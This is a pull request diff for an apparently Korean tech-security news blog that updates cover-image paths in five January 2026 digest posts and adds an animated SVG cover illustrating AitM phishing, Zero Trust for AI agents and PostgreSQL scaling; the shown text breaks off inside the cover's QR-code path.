### PR TITLE
feat(images): Batch 1 - 17 pre-April HQ covers with locked quotas (Jan 23 - Feb 13)

### DIFF
--- a/_posts/2026-01-23-Tech_Security_Weekly_Digest_Microsoft_AitM_Phishing_Agentic_AI_Zero_Trust_OpenAI_PostgreSQL.md
+++ b/_posts/2026-01-23-Tech_Security_Weekly_Digest_Microsoft_AitM_Phishing_Agentic_AI_Zero_Trust_OpenAI_PostgreSQL.md
@@ -8,7 +8,7 @@ comments: true
 date: 2026-01-23 10:00:00 +0900
 description: '2026년 1월 23일 주요 기술/보안 뉴스: Microsoft AitM 피싱 경고, HashiCorp Agentic AI Zero Trust NHI 관리, OpenAI PostgreSQL 8억 사용자 스케일링 아키텍처, vLLM 제작자 Inferact $150M 투자까지...'
 excerpt: "Microsoft AitM 피싱 경고, HashiCorp Agentic AI Zero Trust NHI 관리, OpenAI PostgreSQL 8억 사용자 스케일링 아키텍처, vLLM 제작자 Inferact $150M 투자 등 2026년 1월 23일 주요 기술·보안 뉴스를 분석합니다."
-image: /assets/images/2026-01-23-Tech_Security_Weekly_Digest.svg
+image: /assets/images/2026-01-23-Tech_Security_Weekly_Digest_Microsoft_AitM_Phishing_Agentic_AI_Zero_Trust_OpenAI_PostgreSQL.svg
 image_alt: Tech and Security Weekly Digest January 2026 - AitM Phishing, Zero Trust,
   PostgreSQL Scaling
 layout: post

--- a/_posts/2026-01-24-Tech_Security_Weekly_Digest_BitLocker_FBI_Cloudflare_Route_Leak_Agentic_Enterprise_Docker.md
+++ b/_posts/2026-01-24-Tech_Security_Weekly_Digest_BitLocker_FBI_Cloudflare_Route_Leak_Agentic_Enterprise_Docker.md
@@ -8,7 +8,7 @@ comments: true
 date: 2026-01-24 10:00:00 +0900
 description: '2026년 1월 24일 주요 기술/보안 뉴스: Microsoft FBI BitLocker 암호화 복구 키 제공 논란과 암호화 신뢰성 재검토, Cloudflare 1월 22일 BGP Route Leak 사건 상세 분석과 RPKI 대응, CNCF 자율 기업 4가지 플랫폼 제어 기둥...'
 excerpt: "Microsoft FBI BitLocker 암호화 복구 키 제공 논란, Cloudflare 1월 22일 BGP Route Leak 사건 RPKI 대응 분석, CNCF 자율 기업 플랫폼 제어 기둥 등 2026년 1월 24일 주요 기술·보안 뉴스를 DevSecOps 실무 관점에서 정리합니다."
-image: /assets/images/2026-01-24-Tech_Security_Weekly_Digest.svg
+image: /assets/images/2026-01-24-Tech_Security_Weekly_Digest_BitLocker_FBI_Cloudflare_Route_Leak_Agentic_Enterprise_Docker.svg
 image_alt: Tech and Security Weekly Digest January 2026 - BitLocker, Route Leak, Agentic
   Enterprise
 layout: post

--- a/_posts/2026-01-25-Tech_Security_Weekly_Digest_VMware_vCenter_Fortinet_SSO_Sandworm_DynoWiper_AI_Agents.md
+++ b/_posts/2026-01-25-Tech_Security_Weekly_Digest_VMware_vCenter_Fortinet_SSO_Sandworm_DynoWiper_AI_Agents.md
@@ -8,7 +8,7 @@ comments: true
 date: 2026-01-25 10:00:00 +0900
 description: '2026년 1월 25일 주요 기술/보안 뉴스: CISA KEV 추가 VMware vCenter CVE-2024-37079 활성 익스플로잇 긴급 패치, Fortinet FortiGate 완전 패치 환경 FortiCloud SSO 우회 제로데이, Sandworm APT 폴란드 전력망...'
 excerpt: "CISA KEV 추가 VMware vCenter CVE-2024-37079 긴급 패치, Fortinet FortiGate 완전 패치 환경 FortiCloud SSO 우회 제로데이, Sandworm APT 폴란드 전력망 DynoWiper 공격 등 2026년 1월 25일 주요 보안 뉴스를 분석합니다."
-image: /assets/images/2026-01-25-Tech_Security_Weekly_Digest.svg
+image: /assets/images/2026-01-25-Tech_Security_Weekly_Digest_VMware_vCenter_Fortinet_SSO_Sandworm_DynoWiper_AI_Agents.svg
 image_alt: Tech and Security Weekly Digest January 2026 - VMware vCenter KEV, Fortinet
   SSO Bypass, Sandworm DynoWiper
 layout: post

--- a/_posts/2026-01-26-Tech_Security_Weekly_Digest_Zero_Trust_Agentic_AI_Chrome_Tech_Support_Scam_Terraform_Stacks.md
+++ b/_posts/2026-01-26-Tech_Security_Weekly_Digest_Zero_Trust_Agentic_AI_Chrome_Tech_Support_Scam_Terraform_Stacks.md
@@ -8,7 +8,7 @@ comments: true
 date: 2026-01-26 10:00:00 +0900
 description: '2026년 1월 26일 주요 기술/보안 뉴스: HashiCorp AI 에이전트 시대 비인간 ID(NHI) 관리 Zero Trust 전략, Google Chrome Gemini Nano 기반 온디바이스 기술지원 사기 탐지, Terraform Stacks 네이티브 모노레포 지원,...'
 excerpt: "HashiCorp AI 에이전트 시대 비인간 ID(NHI) Zero Trust 전략, Chrome Gemini Nano 온디바이스 기술지원 사기 탐지, Terraform Stacks 네이티브 모노레포 지원, Prompt Injection 방어까지 2026년 1월 26일 주요 보안·기술 뉴스를 정리합니다."
-image: /assets/images/2026-01-26-Tech_Security_Weekly_Digest_Zero_Trust_Agentic_AI_Terraform.svg
+image: /assets/images/2026-01-26-Tech_Security_Weekly_Digest_Zero_Trust_Agentic_AI_Chrome_Tech_Support_Scam_Terraform_Stacks.svg
 image_alt: Tech and Security Weekly Digest January 2026 - Zero Trust for AI Agents,
   Chrome Scam Detection, Terraform Stacks
 layout: post

--- a/_posts/2026-01-27-Tech_Security_Weekly_Digest_MS_Office_Zero_Day_Kimi_K25_Kimwolf_Botnet_AWS_G7e.md
+++ b/_posts/2026-01-27-Tech_Security_Weekly_Digest_MS_Office_Zero_Day_Kimi_K25_Kimwolf_Botnet_AWS_G7e.md
@@ -8,7 +8,7 @@ comments: true
 date: 2026-01-27 22:00:00 +0900
 description: '2026년 1월 27일 주요 기술/보안 뉴스: Microsoft Office CVE-2026-21509 Zero-Day 긴급 패치, Kimi K2.5 오픈소스 비주얼 에이전트 AI, Kimwolf/Badbox 2.0 IoT 봇넷 200만 기기 감염, AWS EC2 G7e...'
 excerpt: "Microsoft Office CVE-2026-21509 Zero-Day 긴급 패치, Kimi K2.5 오픈소스 비주얼 에이전트 출시, Kimwolf/Badbox 2.0 IoT 봇넷 200만 기기 감염, AWS EC2 G7e NVIDIA Blackwell GPU 출시 등 2026년 1월 27일 주요 보안·기술 뉴스를 정리합니다."
-image: /assets/images/2026-01-27-Tech_Security_Weekly_Digest_MS_Office_Kimi_Kimwolf_AWS.svg
+image: /assets/images/2026-01-27-Tech_Security_Weekly_Digest_MS_Office_Zero_Day_Kimi_K25_Kimwolf_Botnet_AWS_G7e.svg
 image_alt: Tech and Security Weekly Digest January 27 2026 - MS Office Zero Day, Kimi
   K2.5, Kimwolf Botnet, AWS G7e
 layout: post

--- a/assets/images/2026-01-23-Tech_Security_Weekly_Digest_Microsoft_AitM_Phishing_Agentic_AI_Zero_Trust_OpenAI_PostgreSQL.svg
+++ b/assets/images/2026-01-23-Tech_Security_Weekly_Digest_Microsoft_AitM_Phishing_Agentic_AI_Zero_Trust_OpenAI_PostgreSQL.svg
@@ -1,0 +1,308 @@
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: Microsoft AitM Phishing BEC, HashiCorp Agentic AI Zero Trust NHI, OpenAI PostgreSQL 800M users scaling">
+<title>Weekly digest 2026-01-23: Microsoft AitM Phishing (Critical), HashiCorp Zero Trust NHI (High), OpenAI PostgreSQL 800M users</title>
+<!-- profile: high-quality-cover (L22 Stacked Bands, research-based, batch1-locked) -->
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1226"/>
+    <stop offset="50%" stop-color="#0C1430"/>
+    <stop offset="100%" stop-color="#131038"/>
+  </linearGradient>
+  <linearGradient id="bandA" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#2A0A0A"/>
+    <stop offset="100%" stop-color="#1E0D10"/>
+  </linearGradient>
+  <linearGradient id="bandB" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#1A1208"/>
+    <stop offset="100%" stop-color="#22160A"/>
+  </linearGradient>
+  <linearGradient id="bandC" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#081A2A"/>
+    <stop offset="100%" stop-color="#0C1F30"/>
+  </linearGradient>
+  <radialGradient id="phishGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="dbGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3B82F6" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#3B82F6" stop-opacity="0"/>
+  </radialGradient>
+  <linearGradient id="dataFlow" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#3B82F6" stop-opacity="0"/>
+    <stop offset="50%" stop-color="#3B82F6" stop-opacity="0.9"/>
+    <stop offset="100%" stop-color="#60A5FA" stop-opacity="0"/>
+  </linearGradient>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.85"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <pattern id="hexDot" x="0" y="0" width="20" height="20" patternUnits="userSpaceOnUse">
+    <circle cx="10" cy="10" r="0.9" fill="#3A1A1A" opacity="0.6"/>
+  </pattern>
+  <pattern id="gridLines" x="0" y="0" width="30" height="30" patternUnits="userSpaceOnUse">
+    <path d="M0 30 L30 30 M30 0 L30 30" stroke="#1A2A3A" stroke-width="0.4" opacity="0.5"/>
+  </pattern>
+  <pattern id="circuitDot" x="0" y="0" width="18" height="18" patternUnits="userSpaceOnUse">
+    <circle cx="9" cy="9" r="0.8" fill="#3A2A1A" opacity="0.55"/>
+  </pattern>
+</defs>
+
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
+
+<!-- HEADER STRIPE -->
+<rect x="0" y="0" width="1200" height="24" fill="#0D1520" opacity="0.9"/>
+<text x="600" y="16" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" letter-spacing="4" fill="#94A3B8">WEEKLY DIGEST</text>
+<text x="1150" y="16" text-anchor="end" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#64748B">2026.01.23</text>
+<text x="50" y="16" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#64748B">SECURITY + DEVSECOPS</text>
+
+<!-- ============================================================ -->
+<!-- BAND A: Microsoft AitM Phishing — CRITICAL (y=24 to 234) -->
+<!-- ============================================================ -->
+<g>
+  <rect x="0" y="24" width="1200" height="210" fill="url(#bandA)"/>
+  <rect x="0" y="24" width="1200" height="210" fill="url(#hexDot)" opacity="0.7"/>
+  <!-- Left accent bar: Critical red -->
+  <rect x="0" y="24" width="8" height="210" fill="#E63946"/>
+
+  <!-- Text block -->
+  <g filter="url(#textShadow)">
+    <text x="30" y="68" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#F87171">CRITICAL — PHISHING + BEC</text>
+    <text x="30" y="110" font-family="Inter, Helvetica, Arial, sans-serif" font-size="36" font-weight="800" fill="#F5F7FA">Microsoft AitM Phishing</text>
+    <text x="30" y="142" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#FBB6BD">Energy sector : SharePoint abuse : MFA bypass</text>
+    <text x="30" y="168" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#D9C9CE">Adversary-in-the-Middle relay — FIDO2/Passkey required : 48h action window</text>
+  </g>
+
+  <!-- Illustration: AitM relay diagram -->
+  <g transform="translate(540,129)">
+    <!-- Attacker server glow -->
+    <circle cx="0" cy="0" r="72" fill="url(#phishGlow)">
+      <animate attributeName="r" values="55;80;55" dur="3s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="3s" repeatCount="indefinite"/>
+    </circle>
+    <!-- Victim -->
+    <g transform="translate(-170,0)">
+      <rect x="-28" y="-22" width="56" height="44" rx="6" fill="#1E0A0A" stroke="#F87171" stroke-width="1.8"/>
+      <text x="0" y="-5" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FCA5A5">USER</text>
+      <text x="0" y="10" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="600" fill="#FDA4AF">MFA token</text>
+    </g>
+    <!-- Arrow victim -> AitM -->
+    <line x1="-142" y1="0" x2="-42" y2="0" stroke="#E63946" stroke-width="1.5" stroke-dasharray="4 3"/>
+    <polygon points="-42,0 -52,-5 -52,5" fill="#E63946"/>
+    <!-- AitM proxy -->
+    <rect x="-38" y="-30" width="76" height="60" rx="8" fill="#2A0808" stroke="#E63946" stroke-width="2.2"/>
+    <text x="0" y="-8" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="800" fill="#F87171">AitM</text>
+    <text x="0" y="8" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#FCA5A5">PROXY</text>
+    <text x="0" y="22" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#FDA4AF">SharePoint</text>
+    <circle cx="-38" cy="-30" r="5" fill="#E63946" opacity="0.8">
+      <animate attributeName="opacity" values="0.4;1;0.4" dur="1.2s" repeatCount="indefinite"/>
+    </circle>
+    <!-- Arrow AitM -> Microsoft 365 -->
+    <line x1="38" y1="0" x2="130" y2="0" stroke="#F87171" stroke-width="1.5" stroke-dasharray="4 3"/>
+    <polygon points="130,0 120,-5 120,5" fill="#F87171"/>
+    <!-- Microsoft 365 -->
+    <g transform="translate(162,0)">
+      <rect x="-30" y="-22" width="60" height="44" rx="6" fill="#1E1020" stroke="#C084FC" stroke-width="1.8"/>
+      <text x="0" y="-5" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#C084FC">M365</text>
+      <text x="0" y="10" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="600" fill="#DDD6FE">Entra ID</text>
+    </g>
+    <!-- Stolen token indicator -->
+    <text x="0" y="50" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#F87171">Session token stolen</text>
+    <!-- Moving packet animation -->
+    <circle r="4" fill="#E63946">
+      <animateMotion path="M-142,0 L-42,0" dur="1.6s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="4" fill="#F87171">
+      <animateMotion path="M38,0 L130,0" dur="1.6s" begin="0.8s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+
+  <!-- KPI Card: Critical -->
+  <g transform="translate(990,129)" filter="url(#softShadow)">
+    <rect x="-80" y="-62" width="180" height="125" rx="14" fill="#1E0508" stroke="#E63946" stroke-width="2.2"/>
+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#F87171">SEVERITY</text>
+    <text x="10" y="18" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="48" font-weight="900" fill="#F5F7FA">CRIT</text>
+    <text x="10" y="42" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FBB6BD">48h response : FIDO2</text>
+    <circle cx="10" cy="-44" r="5" fill="#E63946">
+      <animate attributeName="opacity" values="0.3;1;0.3" dur="1.4s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+</g>
+
+<!-- ============================================================ -->
+<!-- BAND B: HashiCorp Agentic AI Zero Trust NHI — HIGH (y=234 to 444) -->
+<!-- ============================================================ -->
+<g>
+  <rect x="0" y="234" width="1200" height="210" fill="url(#bandB)"/>
+  <rect x="0" y="234" width="1200" height="210" fill="url(#circuitDot)" opacity="0.7"/>
+  <!-- Left accent bar: High orange -->
+  <rect x="0" y="234" width="8" height="210" fill="#F97316"/>
+
+  <g filter="url(#textShadow)">
+    <text x="30" y="278" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#FB923C">HIGH — AGENTIC AI SECURITY</text>
+    <text x="30" y="320" font-family="Inter, Helvetica, Arial, sans-serif" font-size="36" font-weight="800" fill="#F5F7FA">HashiCorp Zero Trust NHI</text>
+    <text x="30" y="352" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#FED7AA">Non-Human Identity management for Agentic AI</text>
+    <text x="30" y="378" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#E0D5B6">Dynamic secrets : least-privilege : 30-day implementation window</text>
+  </g>
+
+  <!-- Illustration: Zero Trust NHI diagram -->
+  <g transform="translate(600,339)">
+    <!-- Central policy engine -->
+    <rect x="-48" y="-36" width="96" height="72" rx="10" fill="#1A1208" stroke="#F97316" stroke-width="2.2"/>
+    <text x="0" y="-12" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FB923C">ZERO TRUST</text>
+    <text x="0" y="4" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FED7AA">POLICY</text>
+    <text x="0" y="20" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#FCA5A5">HashiCorp</text>
+    <circle cx="0" cy="0" r="80" fill="none" stroke="#F97316" stroke-width="0.8" stroke-dasharray="5 4" opacity="0.4">
+      <animateTransform attributeName="transform" type="rotate" values="0;360" dur="20s" repeatCount="indefinite"/>
+    </circle>
+
+    <!-- AI agents orbiting -->
+    <g>
+      <circle cx="110" cy="-30" r="20" fill="#1E1208" stroke="#F97316" stroke-width="1.6"/>
+      <text x="110" y="-24" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#FB923C">AI</text>
+      <text x="110" y="-12" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#FED7AA">Agent 1</text>
+      <line x1="48" y1="-18" x2="90" y2="-30" stroke="#F97316" stroke-width="1.2" stroke-dasharray="3 3" opacity="0.7"/>
+    </g>
+    <g>
+      <circle cx="110" cy="40" r="20" fill="#1E1208" stroke="#F97316" stroke-width="1.6"/>
+      <text x="110" y="46" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#FB923C">AI</text>
+      <text x="110" y="58" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#FED7AA">Agent 2</text>
+      <line x1="48" y1="18" x2="90" y2="40" stroke="#F97316" stroke-width="1.2" stroke-dasharray="3 3" opacity="0.7"/>
+    </g>
+    <g>
+      <circle cx="-120" cy="0" r="20" fill="#1E1208" stroke="#FBBF24" stroke-width="1.6"/>
+      <text x="-120" y="6" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#FBBF24">VAULT</text>
+      <text x="-120" y="-8" text-anchor="middle" font-family="Inter, monospace" font-size="7" fill="#FED7AA">Secrets</text>
+      <line x1="-48" y1="0" x2="-100" y2="0" stroke="#FBBF24" stroke-width="1.2" stroke-dasharray="3 3" opacity="0.7"/>
+    </g>
+
+    <!-- Dynamic secret token animations -->
+    <circle r="4" fill="#F97316" opacity="0.9">
+      <animateMotion path="M90,-30 L48,-18" dur="2.2s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="4" fill="#F97316" opacity="0.9">
+      <animateMotion path="M90,40 L48,18" dur="2.5s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="3.5" fill="#FBBF24" opacity="0.9">
+      <animateMotion path="M-100,0 L-48,0" dur="1.9s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+
+  <!-- KPI Card: High -->
+  <g transform="translate(990,339)" filter="url(#softShadow)">
+    <rect x="-80" y="-62" width="180" height="125" rx="14" fill="#1E1005" stroke="#F97316" stroke-width="2.2"/>
+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#FB923C">SEVERITY</text>
+    <text x="10" y="18" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="48" font-weight="900" fill="#F5F7FA">HIGH</text>
+    <text x="10" y="42" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FED7AA">NHI : dynamic secrets</text>
+    <circle cx="10" cy="-44" r="5" fill="#F97316">
+      <animate attributeName="opacity" values="0.3;1;0.3" dur="1.8s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+</g>
+
+<!-- ============================================================ -->
+<!-- BAND C: OpenAI PostgreSQL 800M users — MEDIUM (y=444 to 630) -->
+<!-- ============================================================ -->
+<g>
+  <rect x="0" y="444" width="1200" height="186" fill="url(#bandC)"/>
+  <rect x="0" y="444" width="1200" height="186" fill="url(#gridLines)" opacity="0.6"/>
+  <!-- Left accent bar: Medium blue -->
+  <rect x="0" y="444" width="8" height="186" fill="#3B82F6"/>
+
+  <g filter="url(#textShadow)">
+    <text x="30" y="488" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#60A5FA">MEDIUM — DB SCALING</text>
+    <text x="30" y="526" font-family="Inter, Helvetica, Arial, sans-serif" font-size="34" font-weight="800" fill="#F5F7FA">OpenAI PostgreSQL</text>
+    <text x="30" y="556" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#BFDBFE">800M ChatGPT users — RDBMS scales beyond NoSQL</text>
+    <text x="30" y="580" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#CBD5E1">Citus sharding : PgBouncer : read replicas : 90-day planning horizon</text>
+  </g>
+
+  <!-- Illustration: PostgreSQL scaling diagram -->
+  <g transform="translate(580,534)">
+    <!-- Primary DB glow -->
+    <circle cx="0" cy="0" r="60" fill="url(#dbGlow)" opacity="0.8">
+      <animate attributeName="r" values="45;70;45" dur="4s" repeatCount="indefinite"/>
+    </circle>
+    <!-- Primary DB -->
+    <ellipse cx="0" cy="0" rx="38" ry="28" fill="#081A2A" stroke="#3B82F6" stroke-width="2.2"/>
+    <text x="0" y="-6" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#60A5FA">POSTGRES</text>
+    <text x="0" y="10" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#BFDBFE">PRIMARY</text>
+
+    <!-- Replica shards -->
+    <g transform="translate(-150,-20)">
+      <ellipse cx="0" cy="0" rx="28" ry="20" fill="#0C1F30" stroke="#60A5FA" stroke-width="1.5"/>
+      <text x="0" y="5" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="700" fill="#93C5FD">SHARD 1</text>
+      <line x1="28" y1="0" x2="90" y2="6" stroke="#3B82F6" stroke-width="1.2" opacity="0.7"/>
+    </g>
+    <g transform="translate(-150,50)">
+      <ellipse cx="0" cy="0" rx="28" ry="20" fill="#0C1F30" stroke="#60A5FA" stroke-width="1.5"/>
+      <text x="0" y="5" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="700" fill="#93C5FD">SHARD 2</text>
+      <line x1="28" y1="0" x2="90" y2="-24" stroke="#3B82F6" stroke-width="1.2" opacity="0.7"/>
+    </g>
+    <g transform="translate(130,-20)">
+      <ellipse cx="0" cy="0" rx="28" ry="20" fill="#0C1F30" stroke="#60A5FA" stroke-width="1.5"/>
+      <text x="0" y="5" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="700" fill="#93C5FD">REPLICA</text>
+      <line x1="-28" y1="0" x2="-90" y2="6" stroke="#3B82F6" stroke-width="1.2" opacity="0.7"/>
+    </g>
+
+    <!-- Data flow animation -->
+    <rect x="-5" y="-3" width="30" height="6" rx="2" fill="url(#dataFlow)" opacity="0.7">
+      <animate attributeName="x" values="-90;80;-90" dur="2.8s" repeatCount="indefinite"/>
+    </rect>
+  </g>
+
+  <!-- KPI Card: 800M -->
+  <g transform="translate(990,534)" filter="url(#softShadow)">
+    <rect x="-80" y="-62" width="180" height="112" rx="14" fill="#061018" stroke="#3B82F6" stroke-width="2.2"/>
+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#60A5FA">USERS</text>
+    <text x="10" y="18" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="48" font-weight="900" fill="#F5F7FA">800M</text>
+    <text x="10" y="38" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#BFDBFE">Citus sharding</text>
+  </g>
+</g>
+
+<!-- QR placeholder (will be replaced by add_cover_qr.py) -->
+<g transform="translate(1080,496)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF" opacity="0.08"/>
+</g>
+
+<!-- Global ambient animations -->
+<g opacity="0.85">
+  <!-- Band A sparkles -->
+  <g fill="#F87171">
+    <circle cx="800" cy="60" r="1.5"><animate attributeName="opacity" values="0;1;0" dur="1.8s" repeatCount="indefinite"/></circle>
+    <circle cx="840" cy="80" r="1.5"><animate attributeName="opacity" values="0;1;0" dur="2.1s" begin="0.3s" repeatCount="indefinite"/></circle>
+    <circle cx="870" cy="55" r="1.5"><animate attributeName="opacity" values="0;1;0" dur="1.6s" begin="0.6s" repeatCount="indefinite"/></circle>
+    <circle cx="910" cy="75" r="1.2"><animate attributeName="opacity" values="0;1;0" dur="2.3s" begin="0.9s" repeatCount="indefinite"/></circle>
+  </g>
+  <!-- Band B sparkles -->
+  <g fill="#FB923C">
+    <circle cx="780" cy="278" r="1.4"><animate attributeName="opacity" values="0;1;0" dur="2.0s" repeatCount="indefinite"/></circle>
+    <circle cx="830" cy="298" r="1.4"><animate attributeName="opacity" values="0;1;0" dur="1.7s" begin="0.4s" repeatCount="indefinite"/></circle>
+    <circle cx="860" cy="270" r="1.2"><animate attributeName="opacity" values="0;1;0" dur="2.4s" begin="0.8s" repeatCount="indefinite"/></circle>
+  </g>
+  <!-- Band C sparkles -->
+  <g fill="#60A5FA">
+    <circle cx="800" cy="488" r="1.4"><animate attributeName="opacity" values="0;1;0" dur="1.9s" repeatCount="indefinite"/></circle>
+    <circle cx="850" cy="508" r="1.4"><animate attributeName="opacity" values="0;1;0" dur="2.2s" begin="0.5s" repeatCount="indefinite"/></circle>
+    <circle cx="820" cy="524" r="1.2"><animate attributeName="opacity" values="0;1;0" dur="1.6s" begin="1.0s" repeatCount="indefinite"/></circle>
+  </g>
+</g>
+
+<!-- Band separator lines -->
+<line x1="0" y1="234" x2="1200" y2="234" stroke="#FFFFFF" stroke-width="0.3" opacity="0.1"/>
+<line x1="0" y1="444" x2="1200" y2="444" stroke="#FFFFFF" stroke-width="0.3" opacity="0.1"/>
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/01/23/Tech_Security_Weekly_Digest_Microsoft_AitM_Phishing_Agentic_AI_Zero_Trust_OpenAI_PostgreSQL/ : 49x49 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.714286)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h2v1h-2zM11 0h1v1h-1zM16 0h2v1h-2zM22 0h3v1h-3zM27 0h1v1h-1zM29 0h4v1h-4zM34 0h4v1h-4zM40 0h1v1h-1zM42 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM8 1h2v1h-2zM11 1h4v1h-4zM19 1h1v1h-1zM21 1h8v1h-8zM34 1h3v1h-3zM38 1h3v1h-3zM42 1h1v1h-1zM48 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM8 2h1v1h-1zM11 2h1v1h-1zM16 2h2v1h-2zM19 2h1v1h-1zM22 2h1v1h-1zM24 2h1v1h-1zM26 2h2v1h-2zM29 2h1v1h-1zM31 2h1v1h-1zM34 2h2v1h-2zM37 2h1v1h-1zM39 2h2v1h-2zM42 2h1v1h-1zM44 2h3v1h-3zM48 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM9 3h2v1h-2zM12 3h1v1h-1zM14 3h1v1h-1zM17 3h1v1h-1zM20 3h4v1h-4zM25 3h1v1h-1zM27 3h3v1h-3zM31 3h3v1h-3zM35 3h3v1h-3zM39 3h1v1h-1zM42 3h1v1h-1zM44 3h3v1h-3zM48 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h1v1h-1zM10 4h2v1h-2zM14 4h1v1h-1zM16 4h1v1h-1zM18 4h2v1h-2zM21 4h6v1h-6zM30 4h2v1h-2zM36 4h2v1h-2zM42 4h1v1h-1zM44 4h3v1h-3zM48 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM9 5h2v1h-2zM13 5h1v1h-1zM16 5h1v1h-1zM18 5h1v1h-1zM20 5h3v1h-3zM26 5h1v1h-1zM29 5h1v1h-1zM31 5h2v1h-2zM35 5h1v1h-1zM38 5h1v1h-1zM42 5h1v1h-1zM48 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 